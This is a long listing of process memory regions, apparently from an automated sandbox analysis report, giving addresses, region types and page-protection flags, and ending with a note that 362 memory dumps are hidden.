||
3105000
|
unkown
|
page read and write
|
||
3143000
|
unkown
|
page read and write
|
||
376D000
|
unkown
|
page read and write
|
||
1BB00000
|
unkown
|
page read and write
|
||
3234000
|
unkown
|
page readonly
|
||
32E2000
|
unkown
|
page readonly
|
||
3C6000
|
unkown
|
page read and write
|
||
3376000
|
unkown
|
page read and write
|
||
13070000
|
unkown
|
page read and write
|
||
7FF00030000
|
unkown
|
page read and write
|
||
32F5000
|
unkown
|
page readonly
|
||
306000
|
unkown
|
page read and write
|
||
1D57000
|
heap private
|
page read and write
|
||
3754000
|
unkown
|
page read and write
|
||
294000
|
heap default
|
page read and write
|
||
3071000
|
unkown
|
page read and write
|
||
1FA0000
|
unkown
|
page readonly
|
||
490000
|
unkown
|
page readonly
|
||
305A000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page readonly
|
||
390000
|
unkown
|
page read and write
|
||
27DA000
|
unkown
|
page read and write
|
||
2030000
|
unkown
|
page readonly
|
||
28D0000
|
unkown
|
page read and write
|
||
2AD6000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1D60000
|
unkown
|
page readonly
|
||
2D0000
|
heap default
|
page read and write
|
||
AB0000
|
heap private
|
page read and write
|
||
2E84000
|
unkown
|
page read and write
|
||
32AD000
|
unkown
|
page read and write
|
||
32C8000
|
unkown
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
1B70D000
|
unkown
|
page read and write
|
||
2960000
|
unkown
|
page write copy
|
||
1F30000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2CB0000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
31C6000
|
unkown
|
page read and write
|
||
D5000
|
unkown
|
page read and write | page guard
|
||
2E52000
|
unkown
|
page read and write
|
||
3306000
|
unkown
|
page readonly
|
||
7FF00220000
|
unkown
|
page read and write
|
||
1C7EE000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page read and write
|
||
B90000
|
unkown
|
page readonly
|
||
3152000
|
unkown
|
page readonly
|
||
1C70000
|
unkown
|
page write copy
|
||
12F31000
|
unkown
|
page read and write
|
||
1D30000
|
unkown
|
page readonly
|
||
23DD000
|
unkown
|
page read and write
|
||
365C000
|
unkown
|
page read and write
|
||
3282000
|
unkown
|
page readonly
|
||
3D56000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
2C1E000
|
unkown
|
page read and write
|
||
27D0000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1D50000
|
heap private
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
25F000
|
heap default
|
page read and write
|
||
3325000
|
unkown
|
page readonly
|
||
28D0000
|
unkown
|
page read and write
|
||
2AA0000
|
unkown
|
page read and write
|
||
3580000
|
unkown
|
page readonly
|
||
30E000
|
heap default
|
page read and write
|
||
28CF000
|
unkown
|
page read and write
|
||
220000
|
heap private
|
page read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
32B2000
|
unkown
|
page readonly
|
||
3096000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
150000
|
unkown
|
page read and write
|
||
33D5000
|
unkown
|
page readonly
|
||
440000
|
heap private
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
35A0000
|
unkown
|
page readonly
|
||
28D0000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
1D20000
|
unkown
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
330E000
|
unkown
|
page read and write
|
||
3060000
|
unkown
|
page read and write
|
||
2100000
|
unkown
|
page readonly
|
||
3093000
|
unkown
|
page read and write
|
||
3751000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
992000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
373E000
|
unkown
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
287000
|
heap default
|
page read and write
|
||
12E4C000
|
unkown
|
page read and write
|
||
3352000
|
unkown
|
page readonly
|
||
3140000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page read and write
|
||
974000
|
heap private
|
page read and write
|
||
339F000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
35E0000
|
unkown
|
page readonly
|
||
2CE000
|
heap default
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
3101000
|
unkown
|
page read and write
|
||
36E3000
|
unkown
|
page read and write
|
||
2A6000
|
heap default
|
page read and write
|
||
307D000
|
unkown
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
A10000
|
unkown
|
page read and write
|
||
295F000
|
unkown
|
page read and write
|
||
3212000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1DD000
|
heap default
|
page read and write
|
||
3052000
|
unkown
|
page readonly
|
||
315F000
|
unkown
|
page read and write
|
||
318B000
|
unkown
|
page read and write
|
||
2C80000
|
heap private
|
page execute and read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3167000
|
unkown
|
page read and write
|
||
7FF00160000
|
unkown
|
page read and write
|
||
31C0000
|
unkown
|
page read and write
|
||
19C000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
7FF001E0000
|
unkown
|
page execute and read and write
|
||
311C000
|
unkown
|
page read and write
|
||
12F91000
|
unkown
|
page read and write
|
||
1BA00000
|
unkown
|
page read and write
|
||
2C74000
|
heap private
|
page read and write
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1CBC3000
|
heap private
|
page read and write
|
||
444000
|
heap private
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
3127000
|
unkown
|
page read and write
|
||
130D2000
|
unkown
|
page read and write
|
||
7FF0003C000
|
unkown
|
page execute and read and write
|
||
1D0000
|
heap default
|
page read and write
|
||
1B70000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
2C40000
|
heap private
|
page execute and read and write
|
||
3359000
|
unkown
|
page readonly
|
||
5A0000
|
unkown
|
page readonly
|
||
1BA9E000
|
unkown
|
page read and write
|
||
290000
|
heap default
|
page read and write
|
||
31EF000
|
unkown
|
page read and write
|
||
1D00000
|
unkown
|
page read and write
|
||
33A5000
|
unkown
|
page readonly
|
||
1AE80000
|
unkown
|
page read and write
|
||
26B0000
|
heap private
|
page read and write
|
||
2330000
|
unkown
|
page read and write
|
||
8C0000
|
unkown
|
page execute and read and write
|
||
2A0000
|
unkown
|
page execute and read and write
|
||
7FF0002A000
|
unkown
|
page execute and read and write
|
||
12E25000
|
unkown
|
page read and write
|
||
900000
|
unkown
|
page execute and read and write
|
||
4A7000
|
heap default
|
page read and write
|
||
32D3000
|
unkown
|
page read and write
|
||
1BB0000
|
unkown
|
page readonly
|
||
2C78000
|
heap private
|
page read and write
|
||
2E1E000
|
unkown
|
page read and write | page guard
|
||
372E000
|
unkown
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
2820000
|
unkown
|
page read and write
|
||
3181000
|
unkown
|
page read and write
|
||
1FB0000
|
heap private
|
page read and write
|
||
3058000
|
unkown
|
page readonly
|
||
3709000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page read and write
|
||
3842000
|
unkown
|
page read and write
|
||
30A6000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1BA82000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
10008000
|
unkown image
|
page readonly
|
||
2C7B000
|
heap private
|
page read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
1B4F0000
|
unkown
|
page read and write
|
||
1E40000
|
unkown
|
page readonly
|
||
3252000
|
unkown
|
page readonly
|
||
33B9000
|
unkown
|
page readonly
|
||
12E21000
|
unkown
|
page read and write
|
||
361F000
|
unkown
|
page read and write
|
||
2E1F000
|
unkown
|
page read and write
|
||
2B4000
|
heap default
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3086000
|
unkown
|
page read and write
|
||
3767000
|
unkown
|
page read and write
|
There are 362 hidden memdumps, click here to show them.